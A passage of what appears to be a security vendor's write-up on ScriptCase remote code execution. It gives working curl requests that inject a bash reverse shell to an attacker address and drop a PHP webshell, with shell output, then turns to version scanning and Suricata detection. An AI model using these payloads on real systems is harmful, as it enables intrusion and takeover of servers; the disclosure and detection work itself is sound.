[1373,34689,7035],{"class":1383},[1373,34691,1388],{"class":1387},[1373,34693,34694],{"class":1391},"ssh_server",[1373,34696,1388],{"class":1387},[1373,34698,34699],{"class":1383},"];\n",[1373,34701,34702,34704,34706,34708,34711,34713,34715,34717,34719,34722,34724],{"class":1375,"line":4792},[1373,34703,34500],{"class":4636},[1373,34705,1384],{"class":1383},[1373,34707,16090],{"class":1397},[1373,34709,34710],{"class":1379},"empty",[1373,34712,34467],{"class":1383},[1373,34714,34470],{"class":4640},[1373,34716,7035],{"class":1383},[1373,34718,1388],{"class":1387},[1373,34720,34721],{"class":1391},"ssh_port",[1373,34723,1388],{"class":1387},[1373,34725,34726],{"class":1383},"]))\n",[1373,34728,34729],{"class":1375,"line":4798},[1373,34730,28226],{"class":1383},[1373,34732,34733,34735,34737,34740,34742,34745,34747,34749,34751,34753,34755,34757,34759,34761],{"class":1375,"line":4806},[1373,34734,34534],{"class":1383},[1373,34736,34559],{"class":4640},[1373,34738,34739],{"class":1397},".=",[1373,34741,4883],{"class":1387},[1373,34743,34744],{"class":1391}," -p ",[1373,34746,183],{"class":1387},[1373,34748,1398],{"class":1397},[1373,34750,4656],{"class":1383},[1373,34752,34470],{"class":4640},[1373,34754,7035],{"class":1383},[1373,34756,1388],{"class":1387},[1373,34758,34721],{"class":1391},[1373,34760,1388],{"class":1387},[1373,34762,34699],{"class":1383},[1373,34764,34765],{"class":1375,"line":4817},[1373,34766,34552],{"class":1383},[1373,34768,34769,34771,34773,34775,34777,34779,34781,34783,34785,34788,34790],{"class":1375,"line":4825},[1373,34770,34500],{"class":4636},[1373,34772,1384],{"class":1383},[1373,34774,16090],{"class":1397},[1373,34776,34710],{"class":1379},[1373,34778,34467],{"class":1383},[1373,34780,34470],{"class":4640},[1373,34782,7035],{"class":1383},[1373,34784,1388],{"class":1387},[1373,34786,34787],{"class":1391},"ssh_privatecert",[1373,34789,1388],{"class":1387},[1373,34791,34726],{"class":1383},[1373,34793,34794],{"class":1375,"line":4835},[1373,34795,28226],{"class":1383},[1373,34797,34798,34800,34802,34804,34806,34808,34810,34812,34814,34817,34819,34821,34824,34826,34828,34830,34832,34834,34836,34838,34840,34842,34844,34846,34848],{"class":1375,"line":4843},[1373,34799,34534],{"class":1383},[1373,34801,34470],{"class":4640},[1373,34803,7035],{"class":1383},[1373,34805,1388],{"class":1387},[1373,34807,34787],{"class":1391},[1373,34809,1388],{"class":1387},[1373,34811,15050],{"class":1383},[1373,34813,8575],{"class":1397},[1373,34815,34816],{"class":1379}," str_replace",[1373,34818,1384],{"class":1383},[1373,34820,183],{"class":1387},[1373,34822,34823],{"class":2326},"\\\\",[1373,34825,183],{"class":1387},[1373,34827,5437],{"class":1383},[1373,34829,4883],{"class":1387},[1373,34831,2180],{"class":1391},[1373,34833,183],{"class":1387},[1373,34835,5437],{"class":1383},[1373,34837,4656],{"class":1383},[1373,34839,34470],{"class":4640},[1373,34841,7035],{"class":1383},[1373,34843,1388],{"class":1387},[1373,34845,34787],{"class":1391},[1373,34847,1388],{"class":1387},[1373,34849,34850],{"class":1383},"]);\n",[1373,34852,34853],{"class":1375,"line":4849},[1373,34854,6520],{"emptyLinePlaceholder":237},[1373,34856,34857,34860,34862,34865,34867,34869,34871,34873,34875,34877,34879,34881,34883,34885,34888,34890],{"class":1375,"line":4877},[1373,34858,34859],{"class":4636}," if",[1373,34861,1384],{"class":1383},[1373,34863,34864],{"class":1379},"strpos",[1373,34866,34467],{"class":1383},[1373,34868,34470],{"class":4640},[1373,34870,7035],{"class":1383},[1373,34872,1388],{"class":1387},[1373,34874,34787],{"class":1391},[1373,34876,1388],{"class":1387},[1373,34878,27625],{"class":1383},[1373,34880,4883],{"class":1387},[1373,34882,4883],{"class":1387},[1373,34884,2230],{"class":1383},[1373,34886,34887],{"class":1397},"!==",[1373,34889,5971],{"class":7054},[1373,34891,11875],{"class":1383},[1373,34893,34894],{"class":1375,"line":4915},[1373,34895,34896],{"class":1383}," {\n",[1373,34898,34899,34902,34904,34906,34908,34910,34912,34914,34916,34918,34920,34922,34924,34926,34928,34930,34932,34934,34936,34938,34940,34942,34944,34946],{"class":1375,"line":4931},[1373,34900,34901],{"class":1383}," $",[1373,34903,34470],{"class":4640},[1373,34905,7035],{"class":1383},[1373,34907,1388],{"class":1387},[1373,34909,34787],{"class":1391},[1373,34911,1388],{"class":1387},[1373,34913,15050],{"class":1383},[1373,34915,8575],{"class":1397},[1373,34917,4713],{"class":1387},[1373,34919,183],{"class":1391},[1373,34921,1388],{"class":1387},[1373,34923,1398],{"class":1397},[1373,34925,4656],{"class":1383},[1373,34927,34470],{"class":4640},[1373,34929,7035],{"class":1383},[1373,34931,1388],{"class":1387},[1373,34933,34787],{"class":1391},[1373,34935,1388],{"class":1387},[1373,34937,15050],{"class":1383},[1373,34939,1398],{"class":1397},[1373,34941,4713],{"class":1387},[1373,34943,183],{"class":1391},[1373,34945,1388],{"class":1387},[1373,34947,4912],{"class":1383},[1373,34949,34950],{"class":1375,"line":4947},[1373,34951,34952],{"class":1383}," }\n",[1373,34954,34955,34957,34959,34961,34963,34966,34968,34970,34972,34974,34976,34978,34980,34982],{"class":1375,"line":4952},[1373,34956,34534],{"class":1383},[1373,34958,34559],{"class":4640},[1373,34960,34739],{"class":1397},[1373,34962,4883],{"class":1387},[1373,34964,34965],{"class":1391}," -i ",[1373,34967,183],{"class":1387},[1373,34969,1398],{"class":1397},[1373,34971,4656],{"class":1383},[1373,34973,34470],{"class":4640},[1373,34975,7035],{"class":1383},[1373,34977,1388],{"class":1387},[1373,34979,34787],{"class":1391},[1373,34981,1388],{"class":1387},[1373,34983,34699],{"class":1383},[1373,34985,34986],{"class":1375,"line":6776},[1373,34987,34552],{"class":1383},[1373,34989,34990,34992,34994,34996,34998,35001,35003],{"class":1375,"line":6781},[1373,34991,34481],{"class":1383},[1373,34993,34559],{"class":4640},[1373,34995,34739],{"class":1397},[1373,34997,4883],{"class":1387},[1373,34999,35000],{"class":1391}," sleep 60 > ",[1373,35002,183],{"class":1387},[1373,35004,4912],{"class":1383},[1373,35006,35007,35009,35012,35014,35016,35018,35020],{"class":1375,"line":7524},[1373,35008,34481],{"class":1383},[1373,35010,35011],{"class":4640},"tmp ",[1373,35013,5417],{"class":1397},[1373,35015,4883],{"class":1387},[1373,35017,7055],{"class":1391},[1373,35019,183],{"class":1387},[1373,35021,4912],{"class":1383},[1373,35023,35024,35026,35028,35030,35032,35034,35036,35038,35040,35042,35044],{"class":1375,"line":7530},[1373,35025,34500],{"class":4636},[1373,35027,1384],{"class":1383},[1373,35029,34506],{"class":34505},[1373,35031,4667],{"class":1397},[1373,35033,34511],{"class":7297},[1373,35035,7514],{"class":1383},[1373,35037,34516],{"class":1397},[1373,35039,4713],{"class":1387},[1373,35041,34521],{"class":1391},[1373,35043,1388],{"class":1387},[1373,35045,11875],{"class":1383},[1373,35047,35048],{"class":1375,"line":7546},[1373,35049,28226],{"class":1383},[1373,35051,35052,35054,35056,35058,35060,35062,35064],{"class":1375,"line":7571},[1373,35053,34534],{"class":1383},[1373,35055,35011],{"class":4640},[1373,35057,5417],{"class":1397},[1373,35059,4883],{"class":1387},[1373,35061,8857],{"class":1391},[1373,35063,183],{"class":1387},[1373,35065,4912],{"class":1383},[1373,35067,35068],{"class":1375,"line":7598},[1373,35069,34552],{"class":1383},[1373,35071,35072,35074,35076,35078,35080,35083],{"class":1375,"line":7615},[1373,35073,34481],{"class":1383},[1373,35075,34559],{"class":4640},[1373,35077,34739],{"class":1397},[1373,35079,4656],{"class":1383},[1373,35081,35082],{"class":4640},"tmp",[1373,35084,4912],{"class":1383},[1373,35086,35087],{"class":1375,"line":7635},[1373,35088,6520],{"emptyLinePlaceholder":237},[1373,35090,35091,35094,35096,35099],{"class":1375,"line":7640},[1373,35092,35093],{"class":4636}," return",[1373,35095,4656],{"class":1383},[1373,35097,35098],{"class":4640},"str_command",[1373,35100,4912],{"class":1383},[1373,35102,35103],{"class":1375,"line":7648},[1373,35104,1855],{"class":1383},[18,35106,35107],{},"And then it’s executed. Twice, in fact:",[1354,35109,35111],{"className":1367,"code":35110,"language":1369,"meta":219,"style":219},"$cmd_qtd_conn_ssh = $str_unset_ld_library.'ps aux | grep \"'.trim(str_replace(' > \u002Fdev\u002Fnull','',$this->getSSHCommand($arr_ssh))).'\" | grep -v grep | wc -l';\n$qtd_conn_ssh = (int)trim(exec($cmd_qtd_conn_ssh));\nif($qtd_conn_ssh == 0) {\n $str_command = $str_unset_ld_library.$this->getSSHCommand($arr_ssh);\n if($this->bol_sc_debug)\n {\n $time_start = $this->microtime_float();\n $this->sc_start_debug(\"Connect SSH\", $str_command, $time_start);\n }\n\n exec($str_command);\n",[886,35112,35113,35187,35215,35231,35257,35272,35276,35296,35330,35335,35339],{"__ignoreMap":219},[1373,35114,35115,35117,35120,35122,35124,35127,35129,35131,35134,35136,35138,35141,35143,35146,35148,35150,35153,35155,35157,35160,35162,35164,35166,35169,35171,35173,35176,35178,35180,35183,35185],{"class":1375,"line":1376},[1373,35116,4644],{"class":1383},[1373,35118,35119],{"class":4640},"cmd_qtd_conn_ssh ",[1373,35121,5417],{"class":1397},[1373,35123,4656],{"class":1383},[1373,35125,35126],{"class":4640},"str_unset_ld_library",[1373,35128,59],{"class":1397},[1373,35130,1388],{"class":1387},[1373,35132,35133],{"class":1391},"ps aux | grep \"",[1373,35135,1388],{"class":1387},[1373,35137,59],{"class":1397},[1373,35139,35140],{"class":1379},"trim",[1373,35142,1384],{"class":1383},[1373,35144,35145],{"class":1379},"str_replace",[1373,35147,1384],{"class":1383},[1373,35149,1388],{"class":1387},[1373,35151,35152],{"class":1391}," > \u002Fdev\u002Fnull",[1373,35154,1388],{"class":1387},[1373,35156,5437],{"class":1383},[1373,35158,35159],{"class":1387},"''",[1373,35161,5437],{"class":1383},[1373,35163,34506],{"class":34505},[1373,35165,4667],{"class":1397},[1373,35167,35168],{"class":7297},"getSSHCommand",[1373,35170,34467],{"class":1383},[1373,35172,34470],{"class":4640},[1373,35174,35175],{"class":1383},")))",[1373,35177,59],{"class":1397},[1373,35179,1388],{"class":1387},[1373,35181,35182],{"class":1391},"\" | grep -v grep | wc -l",[1373,35184,1388],{"class":1387},[1373,35186,4912],{"class":1383},[1373,35188,35189,35191,35194,35196,35198,35200,35202,35204,35206,35208,35210,35213],{"class":1375,"line":220},[1373,35190,4644],{"class":1383},[1373,35192,35193],{"class":4640},"qtd_conn_ssh ",[1373,35195,5417],{"class":1397},[1373,35197,4641],{"class":1383},[1373,35199,18705],{"class":7293},[1373,35201,2230],{"class":1383},[1373,35203,35140],{"class":1379},[1373,35205,1384],{"class":1383},[1373,35207,27901],{"class":1379},[1373,35209,34467],{"class":1383},[1373,35211,35212],{"class":4640},"cmd_qtd_conn_ssh",[1373,35214,1413],{"class":1383},[1373,35216,35217,35219,35221,35223,35225,35227,35229],{"class":1375,"line":1266},[1373,35218,4637],{"class":4636},[1373,35220,34467],{"class":1383},[1373,35222,35193],{"class":4640},[1373,35224,15920],{"class":1397},[1373,35226,5557],{"class":5467},[1373,35228,2230],{"class":1383},[1373,35230,4765],{"class":1383},[1373,35232,35233,35235,35237,35239,35241,35243,35245,35247,35249,35251,35253,35255],{"class":1375,"line":1852},[1373,35234,4656],{"class":1383},[1373,35236,34559],{"class":4640},[1373,35238,5417],{"class":1397},[1373,35240,4656],{"class":1383},[1373,35242,35126],{"class":4640},[1373,35244,59],{"class":1397},[1373,35246,34506],{"class":34505},[1373,35248,4667],{"class":1397},[1373,35250,35168],{"class":7297},[1373,35252,34467],{"class":1383},[1373,35254,34470],{"class":4640},[1373,35256,4680],{"class":1383},[1373,35258,35259,35261,35263,35265,35267,35270],{"class":1375,"line":4692},[1373,35260,7483],{"class":4636},[1373,35262,1384],{"class":1383},[1373,35264,34506],{"class":34505},[1373,35266,4667],{"class":1397},[1373,35268,35269],{"class":4640},"bol_sc_debug",[1373,35271,11875],{"class":1383},[1373,35273,35274],{"class":1375,"line":4724},[1373,35275,4765],{"class":1383},[1373,35277,35278,35281,35284,35286,35289,35291,35294],{"class":1375,"line":4756},[1373,35279,35280],{"class":1383}," $",[1373,35282,35283],{"class":4640},"time_start ",[1373,35285,5417],{"class":1397},[1373,35287,35288],{"class":34505}," $this",[1373,35290,4667],{"class":1397},[1373,35292,35293],{"class":7297},"microtime_float",[1373,35295,15603],{"class":1383},[1373,35297,35298,35301,35303,35306,35308,35310,35313,35315,35317,35319,35321,35323,35325,35328],{"class":1375,"line":4768},[1373,35299,35300],{"class":34505}," $this",[1373,35302,4667],{"class":1397},[1373,35304,35305],{"class":7297},"sc_start_debug",[1373,35307,1384],{"class":1383},[1373,35309,183],{"class":1387},[1373,35311,35312],{"class":1391},"Connect SSH",[1373,35314,183],{"class":1387},[1373,35316,5437],{"class":1383},[1373,35318,4656],{"class":1383},[1373,35320,35098],{"class":4640},[1373,35322,5437],{"class":1383},[1373,35324,4656],{"class":1383},[1373,35326,35327],{"class":4640},"time_start",[1373,35329,4680],{"class":1383},[1373,35331,35332],{"class":1375,"line":4792},[1373,35333,35334],{"class":1383}," }\n",[1373,35336,35337],{"class":1375,"line":4798},[1373,35338,6520],{"emptyLinePlaceholder":237},[1373,35340,35341,35344,35346,35348],{"class":1375,"line":4806},[1373,35342,35343],{"class":1379}," exec",[1373,35345,34467],{"class":1383},[1373,35347,35098],{"class":4640},[1373,35349,4680],{"class":1383},[18,35351,35352,35353,35355],{},"As you can see, there are multiple parameters we can inject commands into. For simplicity, I’ve selected ",[886,35354,34694],{}," below:",[1354,35357,35360],{"className":35358,"code":35359,"language":1359},[1357],"curl -v 'http:\u002F\u002F10.9.49.69:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php' \\\n -H 'Accept-Language: en-US' \\\n -H 'Cookie: PHPSESSID=fixated' \\\n --data-urlencode 'dbms=sqlite' \\\n --data-urlencode 'conn=conn_sqlite' \\\n --data-urlencode 'dbms=pdosqlite' \\\n --data-urlencode 'use_ssh=Y' \\\n --data-urlencode 'ssh_server=f; bash -c \"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.196\u002F1270 \u003C&1;\"'\n",[886,35361,35359],{"__ignoreMap":219},[18,35363,35364],{},"When that request lands, our listener immediately catches a reverse shell from the target:",[1354,35366,35368],{"className":34366,"code":35367,"language":34368,"meta":219,"style":219},"albinolobster@mournland:~$ nc -lvnp 1270\nListening on 0.0.0.0 1270\nConnection received on 10.9.49.69 39470\nid\nuid=1(daemon) gid=1(daemon) groups=1(daemon)\nps --forest --format user,pid,cmd\nUSER PID CMD\ndaemon 24073 \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fapache\u002Fbin\u002Ffcgi-pm -k start -d \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fapache\u002Fbin\u002F..\ndaemon 24077 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24080 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24081 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24217 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24218 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24219 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24226 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24227 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 24228 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\ndaemon 32998 | \\_ sh -c -- unset LD_LIBRARY_PATH && ssh -o UserKnownHostsFile=\u002Ftmp\u002Fknown_hosts -o StrictHostKeyChecking=no -fNg -L :: @f; bash -c \"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.185\u002F1270 \u003C&1;\" sleep 60 > \u002Fdev\u002Fnull\ndaemon 33000 | \\_ bash -c bash &> \u002Fdev\u002Ftcp\u002F10.9.49.185\u002F1270 \u003C&1; sleep 60\ndaemon 33001 | \\_ bash\ndaemon 33019 | \\_ ps --forest --format user,pid,cmd\n",[886,35369,35370,35380,35385,35390,35394,35399,35404,35409,35414,35419,35424,35429,35434,35439,35444,35449,35454,35459,35464,35469,35474],{"__ignoreMap":219},[1373,35371,35372,35375,35377],{"class":1375,"line":1376},[1373,35373,35374],{"class":9372},"albinolobster@mournland:~",[1373,35376,4644],{"class":1383},[1373,35378,35379],{"class":4640}," nc -lvnp 1270\n",[1373,35381,35382],{"class":1375,"line":220},[1373,35383,35384],{"class":9383},"Listening on 0.0.0.0 1270\n",[1373,35386,35387],{"class":1375,"line":1266},[1373,35388,35389],{"class":9383},"Connection received on 10.9.49.69 39470\n",[1373,35391,35392],{"class":1375,"line":1852},[1373,35393,9460],{"class":9383},[1373,35395,35396],{"class":1375,"line":4692},[1373,35397,35398],{"class":9383},"uid=1(daemon) gid=1(daemon) groups=1(daemon)\n",[1373,35400,35401],{"class":1375,"line":4724},[1373,35402,35403],{"class":9383},"ps --forest --format user,pid,cmd\n",[1373,35405,35406],{"class":1375,"line":4756},[1373,35407,35408],{"class":9383},"USER PID CMD\n",[1373,35410,35411],{"class":1375,"line":4768},[1373,35412,35413],{"class":9383},"daemon 24073 \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fapache\u002Fbin\u002Ffcgi-pm -k start -d \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fapache\u002Fbin\u002F..\n",[1373,35415,35416],{"class":1375,"line":4792},[1373,35417,35418],{"class":9383},"daemon 24077 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35420,35421],{"class":1375,"line":4798},[1373,35422,35423],{"class":9383},"daemon 24080 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35425,35426],{"class":1375,"line":4806},[1373,35427,35428],{"class":9383},"daemon 24081 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35430,35431],{"class":1375,"line":4817},[1373,35432,35433],{"class":9383},"daemon 24217 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35435,35436],{"class":1375,"line":4825},[1373,35437,35438],{"class":9383},"daemon 24218 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35440,35441],{"class":1375,"line":4835},[1373,35442,35443],{"class":9383},"daemon 24219 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35445,35446],{"class":1375,"line":4843},[1373,35447,35448],{"class":9383},"daemon 24226 \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35450,35451],{"class":1375,"line":4849},[1373,35452,35453],{"class":9383},"daemon 24227 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35455,35456],{"class":1375,"line":4877},[1373,35457,35458],{"class":9383},"daemon 24228 | \\_ \u002Fopt\u002FScriptcase\u002Fv9-php81\u002Fcomponents\u002Fphp\u002Fbin\u002Fphp-cgi\n",[1373,35460,35461],{"class":1375,"line":4915},[1373,35462,35463],{"class":9383},"daemon 32998 | \\_ sh -c -- unset LD_LIBRARY_PATH && ssh -o UserKnownHostsFile=\u002Ftmp\u002Fknown_hosts -o StrictHostKeyChecking=no -fNg -L :: @f; bash -c \"bash &> \u002Fdev\u002Ftcp\u002F10.9.49.185\u002F1270 \u003C&1;\" sleep 60 > \u002Fdev\u002Fnull\n",[1373,35465,35466],{"class":1375,"line":4931},[1373,35467,35468],{"class":9383},"daemon 33000 | \\_ bash -c bash &> \u002Fdev\u002Ftcp\u002F10.9.49.185\u002F1270 \u003C&1; sleep 60\n",[1373,35470,35471],{"class":1375,"line":4947},[1373,35472,35473],{"class":9383},"daemon 33001 | \\_ bash\n",[1373,35475,35476],{"class":1375,"line":4952},[1373,35477,35478],{"class":9383},"daemon 33019 | \\_ ps --forest --format user,pid,cmd\n",[18,35480,35481],{},"That works fine for Linux-based installs, but many ScriptCase deployments are on Windows, and a bash reverse shell won’t help there. In that case, we can just drop a minimal PHP webshell instead:",[1354,35483,35485],{"className":34366,"code":35484,"language":34368,"meta":219,"style":219},"curl -v 'http:\u002F\u002F10.9.49.52:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php' \\\n -H 'Accept-Language: en-US' \\\n -H 'Cookie: PHPSESSID=fixated' \\\n --data-urlencode 'dbms=sqlite' \\\n --data-urlencode 'conn=conn_sqlite' \\\n --data-urlencode 'dbms=pdosqlite' \\\n --data-urlencode 'use_ssh=Y' \\\n --data-urlencode 'ssh_server=f & echo ^\u003C?php system($_GET[\"cmd\"]); ?^> > hi.php &'\n",[886,35486,35487,35492,35497,35502,35507,35512,35517,35522],{"__ignoreMap":219},[1373,35488,35489],{"class":1375,"line":1376},[1373,35490,35491],{"class":9383},"curl -v 'http:\u002F\u002F10.9.49.52:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php' \\\n",[1373,35493,35494],{"class":1375,"line":220},[1373,35495,35496],{"class":9383}," -H 'Accept-Language: en-US' \\\n",[1373,35498,35499],{"class":1375,"line":1266},[1373,35500,35501],{"class":9383}," -H 'Cookie: PHPSESSID=fixated' \\\n",[1373,35503,35504],{"class":1375,"line":1852},[1373,35505,35506],{"class":9383}," --data-urlencode 'dbms=sqlite' \\\n",[1373,35508,35509],{"class":1375,"line":4692},[1373,35510,35511],{"class":9383}," --data-urlencode 'conn=conn_sqlite' \\\n",[1373,35513,35514],{"class":1375,"line":4724},[1373,35515,35516],{"class":9383}," --data-urlencode 'dbms=pdosqlite' \\\n",[1373,35518,35519],{"class":1375,"line":4756},[1373,35520,35521],{"class":9383}," --data-urlencode 'use_ssh=Y' \\\n",[1373,35523,35524],{"class":1375,"line":4768},[1373,35525,35526],{"class":9383}," --data-urlencode 'ssh_server=f & echo ^\u003C?php system($_GET[\"cmd\"]); ?^> > hi.php &'\n",[18,35528,35529,35530,35533],{},"This drops a simple webshell to the ScriptCase ",[886,35531,35532],{},"iface"," directory. With that in place, we can execute arbitrary commands without authentication:",[1354,35535,35537],{"className":34366,"code":35536,"language":34368,"meta":219,"style":219},"albinolobster@mournland:~$ curl -kv http:\u002F\u002F10.9.49.52:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fhi.php?cmd=whoami\n* Trying 10.9.49.52:8092...\n* TCP_NODELAY set\n* Connected to 10.9.49.52 (10.9.49.52) port 8092 (#0)\n> GET \u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fhi.php?cmd=whoami HTTP\u002F1.1\n> Host: 10.9.49.52:8092\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n>\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Tue, 12 Aug 2025 18:17:47 GMT\n\u003C Server: Apache\u002F2.4.62 (Win64) mod_fcgid\u002F2.3.10-dev\n\u003C X-Powered-By: PHP\u002F8.1.31\n\u003C Transfer-Encoding: chunked\n\u003C Content-Type: text\u002Fhtml; charset=UTF-8\n\u003C\nnt authority\\system\n \n* Connection #0 to host 10.9.49.52 left intact\n",[886,35538,35539,35557,35562,35567,35572,35590,35597,35604,35619,35623,35628,35633,35638,35643,35648,35653,35658,35663,35668,35672],{"__ignoreMap":219},[1373,35540,35541,35543,35545,35548,35550,35552,35554],{"class":1375,"line":1376},[1373,35542,35374],{"class":9372},[1373,35544,4644],{"class":1383},[1373,35546,35547],{"class":4640}," curl -kv http:\u002F\u002F10.9.49.52:8092\u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fhi.php",[1373,35549,13993],{"class":1397},[1373,35551,17653],{"class":4640},[1373,35553,5417],{"class":1397},[1373,35555,35556],{"class":1391},"whoami\n",[1373,35558,35559],{"class":1375,"line":220},[1373,35560,35561],{"class":9383},"* Trying 10.9.49.52:8092...\n",[1373,35563,35564],{"class":1375,"line":1266},[1373,35565,35566],{"class":9383},"* TCP_NODELAY set\n",[1373,35568,35569],{"class":1375,"line":1852},[1373,35570,35571],{"class":9383},"* Connected to 10.9.49.52 (10.9.49.52) port 8092 (#0)\n",[1373,35573,35574,35576,35579,35581,35583,35585,35587],{"class":1375,"line":4692},[1373,35575,5384],{"class":1383},[1373,35577,35578],{"class":4640}," GET \u002Fscriptcase\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fhi.php",[1373,35580,13993],{"class":1397},[1373,35582,17653],{"class":4640},[1373,35584,5417],{"class":1397},[1373,35586,22876],{"class":1391},[1373,35588,35589],{"class":2206}," HTTP\u002F1.1\n",[1373,35591,35592,35594],{"class":1375,"line":4724},[1373,35593,5384],{"class":1383},[1373,35595,35596],{"class":4640}," Host: 10.9.49.52:8092\n",[1373,35598,35599,35601],{"class":1375,"line":4756},[1373,35600,5384],{"class":1383},[1373,35602,35603],{"class":4640}," User-Agent: curl\u002F7.68.0\n",[1373,35605,35606,35608,35611,35614,35616],{"class":1375,"line":4768},[1373,35607,5384],{"class":1383},[1373,35609,35610],{"class":4640}," Accept: ",[1373,35612,35613],{"class":1397},"*",[1373,35615,2180],{"class":4640},[1373,35617,35618],{"class":1397},"*\n",[1373,35620,35621],{"class":1375,"line":4792},[1373,35622,6765],{"class":1383},[1373,35624,35625],{"class":1375,"line":4798},[1373,35626,35627],{"class":9383},"* Mark bundle as not supporting multiuse\n",[1373,35629,35630],{"class":1375,"line":4806},[1373,35631,35632],{"class":9383},"\u003C HTTP\u002F1.1 200 OK\n",[1373,35634,35635],{"class":1375,"line":4817},[1373,35636,35637],{"class":9383},"\u003C Date: Tue, 12 Aug 2025 18:17:47 GMT\n",[1373,35639,35640],{"class":1375,"line":4825},[1373,35641,35642],{"class":9383},"\u003C Server: Apache\u002F2.4.62 (Win64) mod_fcgid\u002F2.3.10-dev\n",[1373,35644,35645],{"class":1375,"line":4835},[1373,35646,35647],{"class":9383},"\u003C X-Powered-By: PHP\u002F8.1.31\n",[1373,35649,35650],{"class":1375,"line":4843},[1373,35651,35652],{"class":9383},"\u003C Transfer-Encoding: chunked\n",[1373,35654,35655],{"class":1375,"line":4849},[1373,35656,35657],{"class":9383},"\u003C Content-Type: text\u002Fhtml; charset=UTF-8\n",[1373,35659,35660],{"class":1375,"line":4877},[1373,35661,35662],{"class":9383},"\u003C\n",[1373,35664,35665],{"class":1375,"line":4915},[1373,35666,35667],{"class":9383},"nt authority\\system\n",[1373,35669,35670],{"class":1375,"line":4931},[1373,35671,19298],{"class":9383},[1373,35673,35674],{"class":1375,"line":4947},[1373,35675,35676],{"class":9383},"* Connection #0 to host 10.9.49.52 left intact\n",[18,35678,35679],{},"With a webshell or reverse shell in place, the exploitation chain is complete, but that’s only half the story. For defenders, the question becomes: how do you spot this activity before or after it happens?",[1920,35681,1710],{"id":1709},[18,35683,35684],{},"The VulnCheck Initial Access team arms our customers with more than just exploits. We deliver detections like version scanners, Suricata\u002FSnort rules, Sigma rules, and more. The version scanner is often the most important starting point. Defenders should check whether their ScriptCase deployment is vulnerable. By default, the landing page exposes a version string in its HTML, which can be compared directly against patched releases.",[18,35686,35687],{},[68,35688],{":width":10862,"alt":35689,"src":35690},"Version on ScriptCase devel landing page","\u002Fblog\u002Fscriptcase-rce\u002Fscriptcase-version.png",[18,35692,35693,35694,35701],{},"The VulnCheck Initial Access team built a passive version scanner (see our writeup, ",[1131,35695,35696],{},[47,35697,35700],{"href":35698,"rel":35699},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulncheck-goes-scanless",[51],"VulnCheck Goes Scanless",") to run across Shodan data, and 57% of observed instances still reported a vulnerable version.",[1925,35703,35704],{},[18,35705,35706],{},"Internet-facing SiteScript Vulnerability Status",[11128,35708],{":labels":35709,":values":35710},"[\"Vulnerable\",\"Patched\",\"Unknown\"]","[235,125,55]",[18,35712,35713],{},"On the network side, the two key exploitation steps, the unauthenticated password reset and the authenticated command injection, leave distinct HTTP paths and parameters that are easy to match. We’ve developed Suricata signatures to detect both stages, so defenders can spot exploitation attempts before they succeed.",[1354,35715,35717],{"className":34366,"code":35716,"language":34368,"meta":219,"style":219},"alert http any any -> any any ( \\\n msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47227 Production Env Password Reset\"; 